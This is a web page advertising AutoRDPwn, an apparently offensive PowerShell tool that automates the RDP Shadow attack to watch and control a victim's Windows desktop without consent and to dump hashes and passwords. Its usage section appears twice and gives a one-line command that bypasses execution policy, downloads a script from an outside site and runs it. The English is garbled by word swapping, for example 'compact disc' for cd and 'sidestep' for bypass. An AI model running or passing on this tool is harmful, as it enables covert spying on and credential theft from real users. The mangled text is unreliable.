AutoRDPwn is a content made in Powershell and intended to computerize the Shadow assault on Microsoft Windows PCs. This weakness permits a distant aggressor to see his casualty's work area without his assent, and even control it on demand. For its right activity, it is important to agree with the necessities depicted in the client guide.
Necessities
Powershell 5.0 or higher
Use
This application can be utilized locally, from a distance or to turn between PCs. Because of the extra modules, it is feasible to dump hashes and passwords or even recuperate the historical backdrop of RDP associations.
One line execution:
powershell - ep sidestep "compact disc $env:temp ; iwr https://darkbyte.net/autordpwn.php - outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The itemized guide of purpose can be found at the accompanying connection:
darkbyte.net
Necessities
Powershell 5.0 or higher
Use
This application can be utilized locally, from a distance or to turn between PCs. Because of the extra modules, it is feasible to dump hashes and passwords or even recuperate the historical backdrop of RDP associations.
One line execution:
powershell - ep sidestep "compact disc $env:temp ; iwr https://darkbyte.net/autordpwn.php - outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The itemized guide of purpose can be found at the accompanying connection:

Darkbyte • AutoRDPwn - La guía definitiva
Después de muchos cambios, mejoras e intenso desarrollo, AutoRDPwn es más potente y funcional que nunca. Gracias al éxito que ha tenido y por petición popular, he decidido crear una guía de uso paso a paso.
